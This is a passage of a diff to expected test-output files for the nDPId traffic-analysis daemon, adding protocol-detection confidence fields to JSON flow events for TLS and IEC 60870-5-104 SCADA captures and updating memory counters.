+00660{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":193,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1448269145458,"flow_last_seen":1448269145478,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1448269146970,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a00:1450:4001:803::1012","src_port":59690,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}}
 00604{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":193,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1448269145458,"flow_last_seen":1448269145478,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1448269146970,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a00:1450:4001:803::1012","src_port":59690,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00159{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":193,"source":"http_ipv6.pcap","alias":"nDPId-test","total-events-serialized":97}
 ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
@@ -103,9 +103,9 @@
 ~~ total active/idle flows...: 15/15
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4687455 bytes
-~~ total memory freed........: 4687455 bytes
-~~ total allocations/frees...: 99854/99854
+~~ total memory allocated....: 4767816 bytes
+~~ total memory freed........: 4767816 bytes
+~~ total allocations/frees...: 101444/101444
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 164 chars
 ~~ json string max len.......: 2303 chars
diff --git a/test/results/iec60780-5-104.pcap.out b/test/results/iec60780-5-104.pcap.out
index 45ad3eea4..3b56099c3 100644
--- a/test/results/iec60780-5-104.pcap.out
+++ b/test/results/iec60780-5-104.pcap.out
@@ -3,38 +3,38 @@
 00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1219992231267,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"ts_msec":1219992231267,"pkt":"ABXFGNTMABNy14eKCABFAAAwbS5AAIAGRKWsG\/htrBv4TwYgCWR6t61JAAAAAHAC\/\/8CpgAAAgQFtAEBBAI="}
 00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1219992231267,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"ts_msec":1219992231267,"pkt":"ABNy14eKABXFGNTMCABFAAAwQVVAAIAGcH6sG\/hPrBv4bQlkBiDrZdPBeretSnAS\/\/9DbQAAAgQFtAEBBAI="}
 00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1219992231267,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"ts_msec":1219992231267,"pkt":"ABXFGNTMABNy14eKCABFAAAobS9AAIAGRKysG\/htrBv4TwYgCWR6t61K62XTwlAQ\/\/9wMQAAAAAAAAAA"}
-00616{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1219992231267,"flow_last_seen":1219992231283,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":6,"flow_tot_l4_payload_len":6,"flow_avg_l4_payload_len":1,"midstream":0,"ts_msec":1219992231283,"l3_proto":"ip4","src_ip":"172.27.248.109","dst_ip":"172.27.248.79","src_port":1568,"dst_port":2404,"l4_proto":"tcp","ndpi": {"proto":"IEC60870","breed":"Acceptable","category":"IoT-Scada"}}
+00642{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1219992231267,"flow_last_seen":1219992231283,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":6,"flow_tot_l4_payload_len":6,"flow_avg_l4_payload_len":1,"midstream":0,"ts_msec":1219992231283,"l3_proto":"ip4","src_ip":"172.27.248.109","dst_ip":"172.27.248.79","src_port":1568,"dst_port":2404,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"IEC60870","breed":"Acceptable","category":"IoT-Scada"}}
 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":30,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1219992393215,"flow_last_seen":1219992393215,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1219992393215,"l3_proto":"ip4","src_ip":"172.27.248.109","dst_ip":"172.27.248.79","src_port":1570,"dst_port":2404,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":30,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1219992393215,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"ts_msec":1219992393215,"pkt":"ABXFGNTMABNy14eKCABFAAAwbYNAAIAGRFCsG\/htrBv4TwYiCWRtLtqlAAAAAHAC\/\/\/i0AAAAgQFtAEBBAI="}
 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":31,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1219992393215,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"ts_msec":1219992393215,"pkt":"ABNy14eKABXFGNTMCABFAAAwQXdAAIAGcFysG\/hPrBv4bQlkBiJI3nuobS7apnAS\/\/8eOQAAAgQFtAEBBAI="}
 00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":32,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1219992393216,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"ts_msec":1219992393216,"pkt":"ABXFGNTMABNy14eKCABFAAAobYRAAIAGRFesG\/htrBv4TwYiCWRtLtqmSN57qVAQ\/\/9K\/QAAAAAAAAAA"}
-00617{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":33,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1219992393215,"flow_last_seen":1219992393217,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":6,"flow_tot_l4_payload_len":6,"flow_avg_l4_payload_len":1,"midstream":0,"ts_msec":1219992393217,"l3_proto":"ip4","src_ip":"172.27.248.109","dst_ip":"172.27.248.79","src_port":1570,"dst_port":2404,"l4_proto":"tcp","ndpi": {"proto":"IEC60870","breed":"Acceptable","category":"IoT-Scada"}}
+00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":33,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1219992393215,"flow_last_seen":1219992393217,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":6,"flow_tot_l4_payload_len":6,"flow_avg_l4_payload_len":1,"midstream":0,"ts_msec":1219992393217,"l3_proto":"ip4","src_ip":"172.27.248.109","dst_ip":"172.27.248.79","src_port":1570,"dst_port":2404,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"IEC60870","breed":"Acceptable","category":"IoT-Scada"}}
 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":46,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1219992486295,"flow_last_seen":1219992486295,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1219992486295,"l3_proto":"ip4","src_ip":"172.27.248.109","dst_ip":"172.27.248.79","src_port":1571,"dst_port":2404,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":46,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1219992486295,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"ts_msec":1219992486295,"pkt":"ABXFGNTMABNy14eKCABFAAAwbaNAAIAGRDCsG\/htrBv4TwYjCWQlpaXOAAAAAHAC\/\/9fMAAAAgQFtAEBBAI="}
 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":47,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1219992486296,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"ts_msec":1219992486296,"pkt":"ABNy14eKABXFGNTMCABFAAAwQX5AAIAGcFWsG\/hPrBv4bQlkBiP13h8HJaWlz3AS\/\/9KOQAAAgQFtAEBBAI="}
 00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":48,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1219992486296,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"ts_msec":1219992486296,"pkt":"ABXFGNTMABNy14eKCABFAAAobaRAAIAGRDesG\/htrBv4TwYjCWQlpaXP9d4fCFAQ\/\/92\/QAAAAAAAAAA"}
-00617{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":49,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1219992486295,"flow_last_seen":1219992486297,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":6,"flow_tot_l4_payload_len":6,"flow_avg_l4_payload_len":1,"midstream":0,"ts_msec":1219992486297,"l3_proto":"ip4","src_ip":"172.27.248.109","dst_ip":"172.27.248.79","src_port":1571,"dst_port":2404,"l4_proto":"tcp","ndpi": {"proto":"IEC60870","breed":"Acceptable","category":"IoT-Scada"}}
-00658{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":53,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":29,"flow_first_seen":1219992231267,"flow_last_seen":1219992392222,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":14,"flow_tot_l4_payload_len":87,"flow_avg_l4_payload_len":3,"midstream":0,"ts_msec":1219992546671,"l3_proto":"ip4","src_ip":"172.27.248.109","dst_ip":"172.27.248.79","src_port":1568,"dst_port":2404,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"IEC60870","breed":"Acceptable","category":"IoT-Scada"}}
+00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":49,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1219992486295,"flow_last_seen":1219992486297,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":6,"flow_tot_l4_payload_len":6,"flow_avg_l4_payload_len":1,"midstream":0,"ts_msec":1219992486297,"l3_proto":"ip4","src_ip":"172.27.248.109","dst_ip":"172.27.248.79","src_port":1571,"dst_port":2404,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"IEC60870","breed":"Acceptable","category":"IoT-Scada"}}
+00684{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":53,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":29,"flow_first_seen":1219992231267,"flow_last_seen":1219992392222,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":14,"flow_tot_l4_payload_len":87,"flow_avg_l4_payload_len":3,"midstream":0,"ts_msec":1219992546671,"l3_proto":"ip4","src_ip":"172.27.248.109","dst_ip":"172.27.248.79","src_port":1568,"dst_port":2404,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IEC60870","breed":"Acceptable","category":"IoT-Scada"}}
 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":63,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1219992590188,"flow_last_seen":1219992590188,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1219992590188,"l3_proto":"ip4","src_ip":"172.27.248.109","dst_ip":"172.27.248.79","src_port":1572,"dst_port":2404,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":63,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1219992590188,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"ts_msec":1219992590188,"pkt":"ABXFGNTMABNy14eKCABFAAAwbcVAAIAGRA6sG\/htrBv4TwYkCWQxVG2fAAAAAHAC\/\/+LrwAAAgQFtAEBBAI="}
 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":64,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1219992590188,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"ts_msec":1219992590188,"pkt":"ABNy14eKABXFGNTMCABFAAAwQYVAAIAGcE6sG\/hPrBv4bQlkBiSd+ybXMVRtoHAS\/\/\/GywAAAgQFtAEBBAI="}
 00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":65,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1219992590188,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"ts_msec":1219992590188,"pkt":"ABXFGNTMABNy14eKCABFAAAobcZAAIAGRBWsG\/htrBv4TwYkCWQxVG2gnfsm2FAQ\/\/\/zjwAAAAAAAAAA"}
-00617{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":66,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1219992590188,"flow_last_seen":1219992590189,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":6,"flow_tot_l4_payload_len":6,"flow_avg_l4_payload_len":1,"midstream":0,"ts_msec":1219992590189,"l3_proto":"ip4","src_ip":"172.27.248.109","dst_ip":"172.27.248.79","src_port":1572,"dst_port":2404,"l4_proto":"tcp","ndpi": {"proto":"IEC60870","breed":"Acceptable","category":"IoT-Scada"}}
-00658{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":69,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":1219992393215,"flow_last_seen":1219992485282,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":58,"flow_avg_l4_payload_len":3,"midstream":0,"ts_msec":1219992650189,"l3_proto":"ip4","src_ip":"172.27.248.109","dst_ip":"172.27.248.79","src_port":1570,"dst_port":2404,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"IEC60870","breed":"Acceptable","category":"IoT-Scada"}}
-00658{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":77,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1219992486295,"flow_last_seen":1219992589197,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":13,"flow_tot_l4_payload_len":42,"flow_avg_l4_payload_len":2,"midstream":0,"ts_msec":1219992710190,"l3_proto":"ip4","src_ip":"172.27.248.109","dst_ip":"172.27.248.79","src_port":1571,"dst_port":2404,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"IEC60870","breed":"Acceptable","category":"IoT-Scada"}}
+00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":66,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1219992590188,"flow_last_seen":1219992590189,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":6,"flow_tot_l4_payload_len":6,"flow_avg_l4_payload_len":1,"midstream":0,"ts_msec":1219992590189,"l3_proto":"ip4","src_ip":"172.27.248.109","dst_ip":"172.27.248.79","src_port":1572,"dst_port":2404,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"IEC60870","breed":"Acceptable","category":"IoT-Scada"}}
+00684{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":69,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":1219992393215,"flow_last_seen":1219992485282,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":58,"flow_avg_l4_payload_len":3,"midstream":0,"ts_msec":1219992650189,"l3_proto":"ip4","src_ip":"172.27.248.109","dst_ip":"172.27.248.79","src_port":1570,"dst_port":2404,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IEC60870","breed":"Acceptable","category":"IoT-Scada"}}
+00684{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":77,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1219992486295,"flow_last_seen":1219992589197,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":13,"flow_tot_l4_payload_len":42,"flow_avg_l4_payload_len":2,"midstream":0,"ts_msec":1219992710190,"l3_proto":"ip4","src_ip":"172.27.248.109","dst_ip":"172.27.248.79","src_port":1571,"dst_port":2404,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IEC60870","breed":"Acceptable","category":"IoT-Scada"}}
 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":88,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1219992782348,"flow_last_seen":1219992782348,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1219992782348,"l3_proto":"ip4","src_ip":"172.27.248.109","dst_ip":"172.27.248.79","src_port":1577,"dst_port":2404,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":88,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1219992782348,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"ts_msec":1219992782348,"pkt":"ABXFGNTMABNy14eKCABFAAAwbjdAAIAGQ5ysG\/htrBv4TwYpCWQN1WRMAAAAAHAC\/\/+4fAAAAgQFtAEBBAI="}
 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":89,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1219992782348,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"ts_msec":1219992782348,"pkt":"ABNy14eKABXFGNTMCABFAAAwQZFAAIAGcEKsG\/hPrBv4bQlkBikE5Jl8DdVkTXAS\/\/8aCwAAAgQFtAEBBAI="}
 00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":90,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1219992782349,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"ts_msec":1219992782349,"pkt":"ABXFGNTMABNy14eKCABFAAAobjhAAIAGQ6OsG\/htrBv4TwYpCWQN1WRNBOSZfVAQ\/\/9GzwAAAAAAAAAA"}
-00617{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":91,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1219992782348,"flow_last_seen":1219992782350,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":6,"flow_tot_l4_payload_len":6,"flow_avg_l4_payload_len":1,"midstream":0,"ts_msec":1219992782350,"l3_proto":"ip4","src_ip":"172.27.248.109","dst_ip":"172.27.248.79","src_port":1577,"dst_port":2404,"l4_proto":"tcp","ndpi": {"proto":"IEC60870","breed":"Acceptable","category":"IoT-Scada"}}
+00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":91,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1219992782348,"flow_last_seen":1219992782350,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":6,"flow_tot_l4_payload_len":6,"flow_avg_l4_payload_len":1,"midstream":0,"ts_msec":1219992782350,"l3_proto":"ip4","src_ip":"172.27.248.109","dst_ip":"172.27.248.79","src_port":1577,"dst_port":2404,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"IEC60870","breed":"Acceptable","category":"IoT-Scada"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":101,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1219992819942,"flow_last_seen":1219992819942,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1219992819942,"l3_proto":"ip4","src_ip":"172.27.248.109","dst_ip":"172.27.248.79","src_port":1578,"dst_port":2404,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":101,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1219992819942,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"ts_msec":1219992819942,"pkt":"ABXFGNTMABNy14eKCABFAAAwbkRAAIAGQ4+sG\/htrBv4TwYqCWRBsBqPAAAAAHAC\/\/\/OXQAAAgQFtAEBBAI="}
 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":102,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1219992819943,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"ts_msec":1219992819943,"pkt":"ABNy14eKABXFGNTMCABFAAAwQZZAAIAGcD2sG\/hPrBv4bQlkBir5wu6KQbAakHAS\/\/\/l\/gAAAgQFtAEBBAI="}
 00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":103,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1219992819943,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"ts_msec":1219992819943,"pkt":"ABXFGNTMABNy14eKCABFAAAobkVAAIAGQ5asG\/htrBv4TwYqCWRBsBqQ+cLui1AQ\/\/8SwwAAAAAAAAAA"}
-00618{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":104,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1219992819942,"flow_last_seen":1219992819944,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":6,"flow_tot_l4_payload_len":6,"flow_avg_l4_payload_len":1,"midstream":0,"ts_msec":1219992819944,"l3_proto":"ip4","src_ip":"172.27.248.109","dst_ip":"172.27.248.79","src_port":1578,"dst_port":2404,"l4_proto":"tcp","ndpi": {"proto":"IEC60870","breed":"Acceptable","category":"IoT-Scada"}}
-00660{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":115,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":25,"flow_first_seen":1219992590188,"flow_last_seen":1219992781349,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":110,"flow_avg_l4_payload_len":4,"midstream":0,"ts_msec":1219992909959,"l3_proto":"ip4","src_ip":"172.27.248.109","dst_ip":"172.27.248.79","src_port":1572,"dst_port":2404,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"IEC60870","breed":"Acceptable","category":"IoT-Scada"}}
-00659{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":117,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1219992782348,"flow_last_seen":1219992818955,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":17,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":2,"midstream":0,"ts_msec":1219992935396,"l3_proto":"ip4","src_ip":"172.27.248.109","dst_ip":"172.27.248.79","src_port":1577,"dst_port":2404,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"IEC60870","breed":"Acceptable","category":"IoT-Scada"}}
